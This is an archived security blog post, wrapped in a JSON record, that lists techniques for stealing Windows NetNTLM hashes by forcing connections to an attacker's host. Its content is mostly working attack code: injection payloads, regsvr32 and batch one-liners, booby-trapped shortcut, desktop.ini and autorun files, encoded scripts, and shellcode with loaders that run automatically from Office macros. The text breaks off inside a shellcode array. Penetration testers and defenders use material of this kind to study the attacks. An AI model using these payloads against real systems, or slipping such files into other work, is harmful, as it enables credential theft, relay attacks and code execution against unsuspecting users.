{
	"id": "a29a3d2e-4f39-4c0e-8ca3-e0e673c72ee1",
	"created_at": "2026-04-06T00:09:12.933257Z",
	"updated_at": "2026-04-10T03:20:52.63312Z",
	"deleted_at": null,
	"sha1_hash": "087407807b976f1b07d151414b2149778dae876a",
	"title": "Places of Interest in Stealing NetNTLM Hashes | ??????Blog of Osanda",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1638597,
	"plain_text": "Places of Interest in Stealing NetNTLM Hashes | 🔐Blog of Osanda\r\nBy Osanda Malith Jayathissa\r\nPublished: 2017-03-24 · Archived: 2026-04-05 15:39:55 UTC\r\nOne day me and @m3g9tr0n were discussing different places where we can use responder in stealing NetNTLM\r\nhashes. After experimenting I thought of writing this post along with some cool findings in the world of Windows.\r\nSMBRelay attacks are also possible in these scenarios.\r\nLFI\r\nThe include() in PHP will resolve the network path for us.\r\nhttp://host.tld/?page=//11.22.33.44/@OsandaMalith\r\nXXE\r\nIn here I’m using “php://filter/convert.base64-encode/resource=” that will resolve a network path.\r\nhttps://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/\r\nPage 1 of 20\n\n\u003c?xml version=\"1.0\" encoding=\"ISO-8859-1\"?\u003e\r\n\u003c!DOCTYPE root [\u003c!ENTITY xxe SYSTEM \"php://filter/convert.base64-encode/resource=//11.22.33.44/@Osand\r\n]\u003e\r\n\u003croot\u003e\r\n \u003cname\u003e\u003c/name\u003e\r\n \u003ctel\u003e\u003c/tel\u003e\r\n \u003cemail\u003eOUT\u0026xxe;OUT\u003c/email\u003e\r\n \u003cpassword\u003e\u003c/password\u003e\r\n\u003c/root\u003e\r\nXPath Injection\r\nUsually, doc() is used in out-of-band XPath injections, thus can be applied in resolving a network path.\r\nhttp://host.tld/?title=Foundation\u0026type=*\u0026rent_days=* and doc('//35.164.153.224/@OsandaMalith')\r\nhttps://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/\r\nPage 2 of 20\n\nMySQL Injection\r\nI have written a complete post on MySQL out-of-band injections which can be applied over the internet. You can\r\nalso use ‘INTO OUTFILE’ to resolve a network path.\r\nhttp://host.tld/index.php?id=1’ union select 1,2,load_file(‘\\\\\\\\192.168.0.100\\\\@OsandaMalith’),4;%00\r\nhttps://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/\r\nPage 3 of 20\n\nMSSQL\r\nSince stacked queries are supported we can call stored procedures.\r\n[code language=”sql”]\r\n‘;declare @q varchar(99);set @q=’\\\\192.168.254.52\\test’; exec master.dbo.xp_dirtree @q\r\n[/code]\r\nRegsvr32\r\nAccidently found this one while experimenting with .sct files.\r\nregsvr32 /s /u /i://35.164.153.224/@OsandaMalith scrobj.dll\r\nhttps://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/\r\nPage 4 of 20\n\nBatch\r\nThere are many possible ways you can explore\r\necho 1 \u003e //192.168.0.1/abc\r\npushd \\\\192.168.0.1\\abc\r\ncmd /k \\\\192.168.0.1\\abc\r\ncmd /c \\\\192.168.0.1\\abc\r\nstart \\\\192.168.0.1\\abc\r\nmkdir \\\\192.168.0.1\\abc\r\ntype\\\\192.168.0.1\\abc\r\ndir\\\\192.168.0.1\\abc\r\nfind, findstr, [x]copy, move, replace, del, rename and many more!\r\nhttps://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/\r\nPage 5 of 20\n\nAuto-Complete\r\nYou just need to type ‘\\\\host\\’ the auto-complete will do the trick under the explorer and the run dialog box.\r\nAutorun.inf\r\nStarting from Windows 7 this feature is disabled. However you can enable by changing the group policy for\r\nAutorun. Make sure to hide the Autorun.inf file to work.\r\nhttps://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/\r\nPage 6 of 20\n\n[autorun]\r\nopen=\\\\35.164.153.224\\setup.exe\r\nicon=something.ico\r\naction=open Setup.exe\r\nShell Command Files\r\nYou can save this as something.scf and once you open the folder explorer will try to resolve the network path for\r\nthe icon.\r\n[Shell]\r\nCommand=2\r\nIconFile=\\\\35.164.153.224\\test.ico\r\n[Taskbar]\r\nCommand=ToggleDesktop\r\nDesktop.ini\r\nThe desktop.ini files contain the information of the icons you have applied to the folder. We can abuse this to\r\nresolve a network path. Once you open the folder you should get the hashes.\r\nmkdir openMe\r\nattrib +s openMe\r\ncd openMe\r\necho [.ShellClassInfo] \u003e desktop.ini\r\necho IconResource=\\\\192.168.0.1\\aa \u003e\u003e desktop.ini\r\nattrib +s +h desktop.ini\r\nIn Windows XP systems the desktop.ini file uses ‘IcondFile’ instead of ‘IconResource’.\r\n[.ShellClassInfo]\r\nIconFile=\\\\192.168.0.1\\aa\r\nIconIndex=1337\r\nShortcut Files (.lnk)\r\nWe can create a shortcut containing our network path and as you as you open the shortcut Windows will try to\r\nresolve the network path. You can also specify a keyboard shortcut to trigger the shortcut. For the icon you can\r\ngive the name of a Windows binary or choose an icon from either shell32.dll, Ieframe.dll, imageres.dll, pnidui.dll\r\nor wmploc.dll located in the system32 directory.\r\n[code language=”vb”]\r\nSet shl = CreateObject(\u0026quot;WScript.Shell\u0026quot;)\r\nhttps://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/\r\nPage 7 of 20\n\nSet fso = CreateObject(\u0026quot;Scripting.FileSystemObject\u0026quot;)\r\ncurrentFolder = shl.CurrentDirectory\r\nSet sc = shl.CreateShortcut(fso.BuildPath(currentFolder, \u0026quot;\\StealMyHashes.lnk\u0026quot;))\r\nsc.TargetPath = \u0026quot;\\\\35.164.153.224\\@OsandaMalith\u0026quot;\r\nsc.WindowStyle = 1\r\nsc.HotKey = \u0026quot;Ctrl+Alt+O\u0026quot;\r\nsc.IconLocation = \u0026quot;%windir%\\system32\\shell32.dll, 3\u0026quot;\r\nsc.Description = \u0026quot;I will Steal your Hashes\u0026quot;\r\nsc.Save\r\n[/code]\r\nThe Powershell version.\r\n[code language=”powershell”]\r\n$objShell = New-Object -ComObject WScript.Shell\r\n$lnk = $objShell.CreateShortcut(\u0026quot;StealMyHashes.lnk\u0026quot;)\r\n$lnk.TargetPath = \u0026quot;\\\\35.164.153.224\\@OsandaMalith\u0026quot;\r\n$lnk.WindowStyle = 1\r\n$lnk.IconLocation = \u0026quot;%windir%\\system32\\shell32.dll, 3\u0026quot;\r\n$lnk.Description = \u0026quot;I will Steal your Hashes\u0026quot;\r\n$lnk.HotKey = \u0026quot;Ctrl+Alt+O\u0026quot;\r\n$lnk.Save()\r\n[/code]\r\nInternet Shortcuts (.url)\r\nAnother shortcut in Windows is the Internet shortcuts. You can save this as something.url\r\necho [InternetShortcut] \u003e stealMyHashes.url\r\necho URL=file://192.168.0.1/@OsandaMalith \u003e\u003e stealMyHashes.url\r\nAutorun with Registry\r\nYou can add a new registry key in any of the following paths.\r\nhttps://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/\r\nPage 8 of 20\n\nHKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nHKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\r\nPowershell\r\nThere are probably many scriptlets in Powershell that would resolve a network path.\r\n[code language=”powershell”]\r\nInvoke-Item \\\\192.168.0.1\\aa\r\nGet-Content \\\\192.168.0.1\\aa\r\nStart-Process \\\\192.168.0.1\\aa\r\n[/code]\r\nIE\r\nIE will resolve UNC paths. For example\r\n\u003cimg src=\"\\\\\\\\192.168.0.1\\\\aa\"\u003e\r\nYou can inject under XSS or in scenarios you find SQL injection. For example.\r\nhttp://host.tld/?id=-1' union select 1,'\u003cimg src=\"\\\\\\\\192.168.0.1\\\\aa\"\u003e';%00\r\nVBScript\r\nYou can save this as .vbs or can be used inside a macro that is applied to Word or Excel files.\r\n[code language=”vb”]\r\nhttps://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/\r\nPage 9 of 20\n\nSet fso = CreateObject(\u0026quot;Scripting.FileSystemObject\u0026quot;)\r\nSet file = fso.OpenTextFile(\u0026quot;//192.168.0.100/aa\u0026quot;, 1)\r\n[/code]\r\nYou can apply in web pages but this works only with IE.\r\n[code language=”html”]\r\n\u0026lt;html\u0026gt;\r\n\u0026lt;script type=\u0026quot;text/Vbscript\u0026quot;\u0026gt;\r\n\u0026lt;!–\r\nSet fso = CreateObject(\u0026quot;Scripting.FileSystemObject\u0026quot;)\r\nSet file = fso.OpenTextFile(\u0026quot;//192.168.0.100/aa\u0026quot;, 1)\r\n//–\u0026gt;\r\n\u0026lt;/script\u0026gt;\r\n\u0026lt;/html\u0026gt;\r\n[/code]\r\nHere’ the encoded version. You can encode and save this as something.vbe\r\n[code language=”vb”]\r\n#@~^ZQAAAA==jY~6?}’ZM2mO2}4%+1YcEUmDb2YbxocorV?H/O+h6(LnmDE#=?\r\nnO,sksn{0dWcGa+U:+XYsbVcJJzf*cF*cF*2 yczmCE~8#XSAAAA==^#~@\r\n[/code]\r\nYou can apply this in html files too. But only works with IE. You can save this as something.hta which will be an\r\nHTML Application under windows, which mshta.exe will execute it. By default it uses IE.\r\n[code language=”html”]\r\n\u0026lt;html\u0026gt;\r\n\u0026lt;script type=\u0026quot;text/Vbscript.Encode\u0026quot;\u0026gt;\r\n\u0026lt;!–\r\n#@~^ZQAAAA==jY~6?}’ZM2mO2}4%+1YcEUmDb2YbxocorV?H/O+h6(LnmDE#=?\r\nnO,sksn{0dWcGa+U:+XYsbVcJJzf*cF*cF*2 yczmCE~8#XSAAAA==^#~@\r\n//–\u0026gt;\r\n\u0026lt;/script\u0026gt;\r\n\u0026lt;/html\u0026gt;\r\n[/code]\r\nJScript\r\nYou can save this as something.js under windows.\r\n[code language=”javascript”]\r\nvar fso = new ActiveXObject(\u0026quot;Scripting.FileSystemObject\u0026quot;)\r\nfso.FileExists(\u0026quot;//192.168.0.103/aa\u0026quot;)\r\n[/code]\r\nYou can apply the same in html files but only works with IE. Also you can save this as something.hta.\r\n[code language=”html”]\r\n\u0026lt;html\u0026gt;\r\nhttps://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/\r\nPage 10 of 20\n\n\u0026lt;script type=\u0026quot;text/Jscript\u0026quot;\u0026gt;\r\n\u0026lt;!–\r\nvar fso = new ActiveXObject(\u0026quot;Scripting.FileSystemObject\u0026quot;)\r\nfso.FileExists(\u0026quot;//192.168.0.103/aa\u0026quot;)\r\n//–\u0026gt;\r\n\u0026lt;/script\u0026gt;\r\n\u0026lt;/html\u0026gt;\r\n[/code]\r\nHere’s the encoded version. You can save this as something.jse.\r\n[code language=”javascript”]\r\n#@~^XAAAAA==-mD~6/K’xh,)mDk-+or8%mYvE?\r\n1DkaOrxTRwks+jzkYn:}8LmOE*i0dGcsrV3XkdD/vJzJFO+R8v0RZRqT2zlmE#Ux4AAA==^#~@\r\n[/code]\r\nThe html version of this.\r\n[code language=”html”]\r\n\u0026lt;html\u0026gt;\r\n\u0026lt;script type=\u0026quot;text/Jscript.Encode\u0026quot;\u0026gt;\r\n\u0026lt;!–\r\n#@~^XAAAAA==-mD~6/K’xh,)mDk-+or8%mYvE?\r\n1DkaOrxTRwks+jzkYn:}8LmOE*i0dGcsrV3XkdD/vJzJFO+R8v0RZRqT2zlmE#Ux4AAA==^#~@\r\n//–\u0026gt;\r\n\u0026lt;/script\u0026gt;\r\n\u0026lt;/html\u0026gt;\r\n[/code]\r\nWindows Script Files\r\nSave this as something.wsf.\r\n[code language=”xml”]\r\n\u0026lt;package\u0026gt;\r\n\u0026lt;job id=\u0026quot;boom\u0026quot;\u0026gt;\r\n\u0026lt;script language=\u0026quot;VBScript\u0026quot;\u0026gt;\r\nSet fso = CreateObject(\u0026quot;Scripting.FileSystemObject\u0026quot;)\r\nSet file = fso.OpenTextFile(\u0026quot;//192.168.0.100/aa\u0026quot;, 1)\r\n\u0026lt;/script\u0026gt;\r\n\u0026lt;/job\u0026gt;\r\n\u0026lt;/package\u0026gt;\r\n[/code]\r\nShellcode\r\nhttps://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/\r\nPage 11 of 20\n\nHere’s a small shellcode I made. This shellcode uses CreateFile and tries to read a non-existing network path. You\r\ncan use tools such as Responder to capture NetNTLM hashes. The shellcode can be modified to steal hashes over\r\nthe internet. SMBRelay attacks can also be performed.\r\n[code language=”c”]\r\n/*\r\nTitle: CreateFile Shellcode\r\nAuthor: Osanda Malith Jayathissa (@OsandaMalith)\r\nWebsite: https://osandamalith.com\r\nSize: 368 Bytes\r\n*/\r\n# include \u0026lt;stdlib.h\u0026gt;\r\n# include \u0026lt;stdio.h\u0026gt;\r\n# include \u0026lt;string.h\u0026gt;\r\n# include \u0026lt;windows.h\u0026gt;\r\nint main() {\r\nchar *shellcode =\r\n\u0026quot;\\xe8\\xff\\xff\\xff\\xff\\xc0\\x5f\\xb9\\x4c\\x03\\x02\\x02\\x81\\xf1\\x02\\x02\u0026quot;\r\n\u0026quot;\\x02\\x02\\x83\\xc7\\x1d\\x33\\xf6\\xfc\\x8a\\x07\\x3c\\x05\\x0f\\x44\\xc6\\xaa\u0026quot;\r\n\u0026quot;\\xe2\\xf6\\xe8\\x05\\x05\\x05\\x05\\x5e\\x8b\\xfe\\x81\\xc6\\x29\\x01\\x05\\x05\u0026quot;\r\n\u0026quot;\\xb9\\x02\\x05\\x05\\x05\\xfc\\xad\\x01\\x3c\\x07\\xe2\\xfa\\x56\\xb9\\x8d\\x10\u0026quot;\r\n\u0026quot;\\xb7\\xf8\\xe8\\x5f\\x05\\x05\\x05\\x68\\x31\\x01\\x05\\x05\\xff\\xd0\\xb9\\xe0\u0026quot;\r\n\u0026quot;\\x53\\x31\\x4b\\xe8\\x4e\\x05\\x05\\x05\\xb9\\xac\\xd5\\xaa\\x88\\x8b\\xf0\\xe8\u0026quot;\r\n\u0026quot;\\x42\\x05\\x05\\x05\\x6a\\x05\\x68\\x80\\x05\\x05\\x05\\x6a\\x03\\x6a\\x05\\x6a\u0026quot;\r\n\u0026quot;\\x01\\x68\\x05\\x05\\x05\\x80\\x68\\x3e\\x01\\x05\\x05\\xff\\xd0\\x6a\\x05\\xff\u0026quot;\r\n\u0026quot;\\xd6\\x33\\xc0\\x5e\\xc3\\x33\\xd2\\xeb\\x10\\xc1\\xca\\x0d\\x3c\\x61\\x0f\\xbe\u0026quot;\r\n\u0026quot;\\xc0\\x7c\\x03\\x83\\xe8\\x20\\x03\\xd0\\x41\\x8a\\x01\\x84\\xc0\\x75\\xea\\x8b\u0026quot;\r\n\u0026quot;\\xc2\\xc3\\x8d\\x41\\xf8\\xc3\\x55\\x8b\\xec\\x83\\xec\\x14\\x53\\x56\\x57\\x89\u0026quot;\r\n\u0026quot;\\x4d\\xf4\\x64\\xa1\\x30\\x05\\x05\\x05\\x89\\x45\\xfc\\x8b\\x45\\xfc\\x8b\\x40\u0026quot;\r\n\u0026quot;\\x0c\\x8b\\x40\\x14\\x89\\x45\\xec\\x8b\\xf8\\x8b\\xcf\\xe8\\xd2\\xff\\xff\\xff\u0026quot;\r\n\u0026quot;\\x8b\\x70\\x18\\x8b\\x3f\\x85\\xf6\\x74\\x4f\\x8b\\x46\\x3c\\x8b\\x5c\\x30\\x78\u0026quot;\r\n\u0026quot;\\x85\\xdb\\x74\\x44\\x8b\\x4c\\x33\\x0c\\x03\\xce\\xe8\\x96\\xff\\xff\\xff\\x8b\u0026quot;\r\n\u0026quot;\\x4c\\x33\\x20\\x89\\x45\\xf8\\x33\\xc0\\x03\\xce\\x89\\x4d\\xf0\\x89\\x45\\xfc\u0026quot;\r\n\u0026quot;\\x39\\x44\\x33\\x18\\x76\\x22\\x8b\\x0c\\x81\\x03\\xce\\xe8\\x75\\xff\\xff\\xff\u0026quot;\r\n\u0026quot;\\x03\\x45\\xf8\\x39\\x45\\xf4\\x74\\x1c\\x8b\\x45\\xfc\\x8b\\x4d\\xf0\\x40\\x89\u0026quot;\r\n\u0026quot;\\x45\\xfc\\x3b\\x44\\x33\\x18\\x72\\xde\\x3b\\x7d\\xec\\x75\\x9c\\x33\\xc0\\x5f\u0026quot;\r\n\u0026quot;\\x5e\\x5b\\xc9\\xc3\\x8b\\x4d\\xfc\\x8b\\x44\\x33\\x24\\x8d\\x04\\x48\\x0f\\xb7\u0026quot;\r\n\u0026quot;\\x0c\\x30\\x8b\\x44\\x33\\x1c\\x8d\\x04\\x88\\x8b\\x04\\x30\\x03\\xc6\\xeb\\xdf\u0026quot;\r\n\u0026quot;\\x21\\x05\\x05\\x05\\x50\\x05\\x05\\x05\\x6b\\x65\\x72\\x6e\\x65\\x6c\\x33\\x32\u0026quot;\r\n\u0026quot;\\x2e\\x64\\x6c\\x6c\\x05\\x2f\\x2f\\x65\\x72\\x72\\x6f\\x72\\x2f\\x61\\x61\\x05\u0026quot;;\r\nDWORD oldProtect;\r\nhttps://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/\r\nPage 12 of 20\n\nwprintf(L\u0026quot;Length : %d bytes\\n@OsandaMalith\u0026quot;, strlen(shellcode));\r\nBOOL ret = VirtualProtect (shellcode, strlen(shellcode), PAGE_EXECUTE_READWRITE, \u0026amp;oldProtect);\r\nif (!ret) {\r\nfprintf(stderr, \u0026quot;%s\u0026quot;, \u0026quot;Error Occured\u0026quot;);\r\nreturn EXIT_FAILURE;\r\n}\r\n((void(*)(void))shellcode)();\r\nVirtualProtect (shellcode, strlen(shellcode), oldProtect, \u0026amp;oldProtect);\r\nreturn EXIT_SUCCESS;\r\n}\r\n[/code]\r\nhttps://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html\r\nShellcode Inside Macros\r\nHere’s the above shellcode applied inside a Word/Excel macro. You can use the same code inside a VB6\r\napplication.\r\nhttps://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/\r\nPage 13 of 20\n\n[code language=”vb”]\r\n‘ Author : Osanda Malith Jayathissa (@OsandaMalith)\r\n‘ Title: Shellcode to request a non-existing network path\r\n‘ Website: https://osandamalith\r\n‘ Shellcode : https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html\r\n‘ This is a word/excel macro. This can be used in vb6 applications as well\r\n#If Vba7 Then\r\nPrivate Declare PtrSafe Function CreateThread Lib \u0026quot;kernel32\u0026quot; ( _\r\nByVal lpThreadAttributes As Long, _\r\nByVal dwStackSize As Long, _\r\nByVal lpStartAddress As LongPtr, _\r\nlpParameter As Long, _\r\nByVal dwCreationFlags As Long, _\r\nlpThreadId As Long) As LongPtr\r\nPrivate Declare PtrSafe Function VirtualAlloc Lib \u0026quot;kernel32\u0026quot; ( _\r\nByVal lpAddress As Long, _\r\nByVal dwSize As Long, _\r\nByVal flAllocationType As Long, _\r\nByVal flProtect As Long) As LongPtr\r\nPrivate Declare PtrSafe Function RtlMoveMemory Lib \u0026quot;kernel32\u0026quot; ( _\r\nByVal Destination As LongPtr, _\r\nByRef Source As Any, _\r\nByVal Length As Long) As LongPtr\r\n#Else\r\nPrivate Declare Function CreateThread Lib \u0026quot;kernel32\u0026quot; ( _\r\nByVal lpThreadAttributes As Long, _\r\nByVal dwStackSize As Long, _\r\nByVal lpStartAddress As Long, _\r\nlpParameter As Long, _\r\nByVal dwCreationFlags As Long, _\r\nlpThreadId As Long) As Long\r\nPrivate Declare Function VirtualAlloc Lib \u0026quot;kernel32\u0026quot; ( _\r\nByVal lpAddress As Long, _\r\nByVal dwSize As Long, _\r\nByVal flAllocationType As Long, _\r\nByVal flProtect As Long) As Long\r\nPrivate Declare Function RtlMoveMemory Lib \u0026quot;kernel32\u0026quot; ( _\r\nByVal Destination As Long, _\r\nhttps://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/\r\nPage 14 of 20\n\nByRef Source As Any, _\r\nByVal Length As Long) As Long\r\n#EndIf\r\nConst MEM_COMMIT = \u0026amp;H1000\r\nConst PAGE_EXECUTE_READWRITE = \u0026amp;H40\r\nSub Auto_Open()\r\nDim source As Long, i As Long\r\n#If Vba7 Then\r\nDim lpMemory As LongPtr, lResult As LongPtr\r\n#Else\r\nDim lpMemory As Long, lResult As Long\r\n#EndIf\r\nDim bShellcode(376) As Byte\r\nbShellcode(0) = 232\r\nbShellcode(1) = 255\r\nbShellcode(2) = 255\r\nbShellcode(3) = 255\r\nbShellcode(4) = 255\r\nbShellcode(5) = 192\r\nbShellcode(6) = 95\r\nbShellcode(7) = 185\r\nbShellcode(8) = 85\r\nbShellcode(9) = 3\r\nbShellcode(10) = 2\r\nbShellcode(11) = 2\r\nbShellcode(12) = 129\r\nbShellcode(13) = 241\r\nbShellcode(14) = 2\r\nbShellcode(15) = 2\r\nbShellcode(16) = 2\r\n…………………\r\nlpMemory = VirtualAlloc(0, UBound(bShellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE)\r\nFor i = LBound(bShellcode) To UBound(bShellcode)\r\nsource = bShellcode(i)\r\nlResult = RtlMoveMemory(lpMemory + i, source, 1)\r\nNext i\r\nlResult = CreateThread(0, 0, lpMemory, 0, 0, 0)\r\nEnd Sub\r\nSub AutoOpen()\r\nAuto_Open\r\nhttps://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/\r\nPage 15 of 20\n\nEnd Sub\r\nSub Workbook_Open()\r\nAuto_Open\r\nEnd Sub\r\n[/code]\r\nhttps://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.vba\r\nShellcode Inside VBS and JS\r\nsubTee has done many kinds of research with JS and DynamicWrapperX. You can find a POC using the\r\nDynamicWrapperX DLL.\r\nhttp://subt0x10.blogspot.com/2016/09/shellcode-via-jscript-vbscript.html\r\nBased on that I have ported the shellcode to JS and VBS. The fun part is we can embed shellcode in JScript or\r\nVBScript inside html and .hta formats.\r\nNote the following shellcode directs to my IP.\r\nJScript\r\n[code language=”javascript”]\r\n/*\r\n* Author : Osanda Malith Jayathissa (@OsandaMalith)\r\n* Title: Shellcode to request a non-existing network path\r\n* Website: https://osandamalith.com\r\n* Shellcode : https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html\r\n* Based on subTee’s JS: https://gist.github.com/subTee/1a6c96df38b9506506f1de72573ceb04\r\n*/\r\nDX = new ActiveXObject(\u0026quot;DynamicWrapperX\u0026quot;);\r\nDX.Register(\u0026quot;kernel32.dll\u0026quot;, \u0026quot;VirtualAlloc\u0026quot;, \u0026quot;i=luuu\u0026quot;, \u0026quot;r=u\u0026quot;);\r\nDX.Register(\u0026quot;kernel32.dll\u0026quot;,\u0026quot;CreateThread\u0026quot;,\u0026quot;i=uullu\u0026quot;,\u0026quot;r=u\u0026quot; );\r\nDX.Register(\u0026quot;kernel32.dll\u0026quot;, \u0026quot;WaitForSingleObject\u0026quot;, \u0026quot;i=uu\u0026quot;,\r\n\u0026quot;r=u\u0026quot;);\r\nvar MEM_COMMIT = 0x1000;\r\nvar PAGE_EXECUTE_READWRITE = 0x40;\r\nvar sc = [\r\n0xe8, 0xff, 0xff, 0xff, 0xff, 0xc0, 0x5f, 0xb9, 0x55, 0x03, 0x02, 0x02, 0x81, 0xf1, 0x02, 0x02, 0x02, 0x02, 0x83,\r\n0xc7,\r\n0x1d, 0x33, 0xf6, 0xfc, 0x8a, 0x07, 0x3c, 0x05, 0x0f, 0x44, 0xc6, 0xaa, 0xe2, 0xf6, 0xe8, 0x05, 0x05, 0x05,\r\n0x05, 0x5e,\r\n0x8b, 0xfe, 0x81, 0xc6, 0x29, 0x01, 0x05, 0x05, 0xb9, 0x02, 0x05, 0x05, 0x05, 0xfc, 0xad, 0x01, 0x3c, 0x07,\r\n0xe2, 0xfa,\r\n0x56, 0xb9, 0x8d, 0x10, 0xb7, 0xf8, 0xe8, 0x5f, 0x05, 0x05, 0x05, 0x68, 0x31, 0x01, 0x05, 0x05, 0xff, 0xd0,\r\n0xb9, 0xe0,\r\nhttps://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/\r\nPage 16 of 20\n\n0x53, 0x31, 0x4b, 0xe8, 0x4e, 0x05, 0x05, 0x05, 0xb9, 0xac, 0xd5, 0xaa, 0x88, 0x8b, 0xf0, 0xe8, 0x42, 0x05,\r\n0x05, 0x05,\r\n0x6a, 0x05, 0x68, 0x80, 0x05, 0x05, 0x05, 0x6a, 0x03, 0x6a, 0x05, 0x6a, 0x01, 0x68, 0x05, 0x05, 0x05, 0x80,\r\n0x68, 0x3e,\r\n0x01, 0x05, 0x05, 0xff, 0xd0, 0x6a, 0x05, 0xff, 0xd6, 0x33, 0xc0, 0x5e, 0xc3, 0x33, 0xd2, 0xeb, 0x10, 0xc1,\r\n0xca, 0x0d,\r\n0x3c, 0x61, 0x0f, 0xbe, 0xc0, 0x7c, 0x03, 0x83, 0xe8, 0x20, 0x03, 0xd0, 0x41, 0x8a, 0x01, 0x84, 0xc0, 0x75,\r\n0xea, 0x8b,\r\n0xc2, 0xc3, 0x8d, 0x41, 0xf8, 0xc3, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x14, 0x53, 0x56, 0x57, 0x89, 0x4d, 0xf4,\r\n0x64, 0xa1,\r\n0x30, 0x05, 0x05, 0x05, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x8b, 0x40, 0x0c, 0x8b, 0x40, 0x14, 0x89, 0x45,\r\n0xec, 0x8b,\r\n0xf8, 0x8b, 0xcf, 0xe8, 0xd2, 0xff, 0xff, 0xff, 0x8b, 0x70, 0x18, 0x8b, 0x3f, 0x85, 0xf6, 0x74, 0x4f, 0x8b, 0x46,\r\n0x3c,\r\n0x8b, 0x5c, 0x30, 0x78, 0x85, 0xdb, 0x74, 0x44, 0x8b, 0x4c, 0x33, 0x0c, 0x03, 0xce, 0xe8, 0x96, 0xff, 0xff, 0xff,\r\n0x8b,\r\n0x4c, 0x33, 0x20, 0x89, 0x45, 0xf8, 0x33, 0xc0, 0x03, 0xce, 0x89, 0x4d, 0xf0, 0x89, 0x45, 0xfc, 0x39, 0x44,\r\n0x33, 0x18,\r\n0x76, 0x22, 0x8b, 0x0c, 0x81, 0x03, 0xce, 0xe8, 0x75, 0xff, 0xff, 0xff, 0x03, 0x45, 0xf8, 0x39, 0x45, 0xf4, 0x74,\r\n0x1c,\r\n0x8b, 0x45, 0xfc, 0x8b, 0x4d, 0xf0, 0x40, 0x89, 0x45, 0xfc, 0x3b, 0x44, 0x33, 0x18, 0x72, 0xde, 0x3b, 0x7d,\r\n0xec, 0x75,\r\n0x9c, 0x33, 0xc0, 0x5f, 0x5e, 0x5b, 0xc9, 0xc3, 0x8b, 0x4d, 0xfc, 0x8b, 0x44, 0x33, 0x24, 0x8d, 0x04, 0x48,\r\n0x0f, 0xb7,\r\n0x0c, 0x30, 0x8b, 0x44, 0x33, 0x1c, 0x8d, 0x04, 0x88, 0x8b, 0x04, 0x30, 0x03, 0xc6, 0xeb, 0xdf, 0x21, 0x05,\r\n0x05, 0x05,\r\n0x50, 0x05, 0x05, 0x05, 0x6b, 0x65, 0x72, 0x6e, 0x65, 0x6c, 0x33, 0x32, 0x2e, 0x64, 0x6c, 0x6c, 0x05, 0x2f,\r\n0x2f, 0x33,\r\n0x35, 0x2e, 0x31, 0x36, 0x34, 0x2e, 0x31, 0x35, 0x33, 0x2e, 0x32, 0x32, 0x34, 0x2f, 0x61, 0x61, 0x05];\r\nvar scLocation = DX.VirtualAlloc(0, sc.length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\nfor(var i = 0; i \u0026lt; sc.length; i++) DX.NumPut(sc[i],scLocation,i);\r\nvar thread = DX.CreateThread(0,0,scLocation,0,0);\r\n[/code]\r\nhttps://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.js\r\nVBScript\r\n[code language=”vb”]\r\n‘ Author : Osanda Malith Jayathissa (@OsandaMalith)\r\n‘ Title: Shellcode to request a non-existing network path\r\n‘ Website: https://osandamalith.com\r\nhttps://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/\r\nPage 17 of 20\n\n‘ Shellcode : https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html\r\n‘ Based on subTee’s JS: https://gist.github.com/subTee/1a6c96df38b9506506f1de72573ceb04\r\nSet DX = CreateObject(\u0026quot;DynamicWrapperX\u0026quot;)\r\nDX.Register \u0026quot;kernel32.dll\u0026quot;, \u0026quot;VirtualAlloc\u0026quot;, \u0026quot;i=luuu\u0026quot;, \u0026quot;r=u\u0026quot;\r\nDX.Register \u0026quot;kernel32.dll\u0026quot;,\u0026quot;CreateThread\u0026quot;,\u0026quot;i=uullu\u0026quot;,\u0026quot;r=u\u0026quot;\r\nDX.Register \u0026quot;kernel32.dll\u0026quot;, \u0026quot;WaitForSingleObject\u0026quot;, \u0026quot;i=uu\u0026quot;,\r\n\u0026quot;r=u\u0026quot;\r\nConst MEM_COMMIT = \u0026amp;H1000\r\nConst PAGE_EXECUTE_READWRITE = \u0026amp;H40\r\nshellcode = Array( _\r\n\u0026amp;He8, \u0026amp;Hff, \u0026amp;Hff, \u0026amp;Hff, \u0026amp;Hff, \u0026amp;Hc0, \u0026amp;H5f, \u0026amp;Hb9, \u0026amp;H55,\r\n\u0026amp;H03, \u0026amp;H02, \u0026amp;H02, \u0026amp;H81, \u0026amp;Hf1, \u0026amp;H02, \u0026amp;H02, \u0026amp;H02, \u0026amp;H02,\r\n\u0026amp;H83, \u0026amp;Hc7, 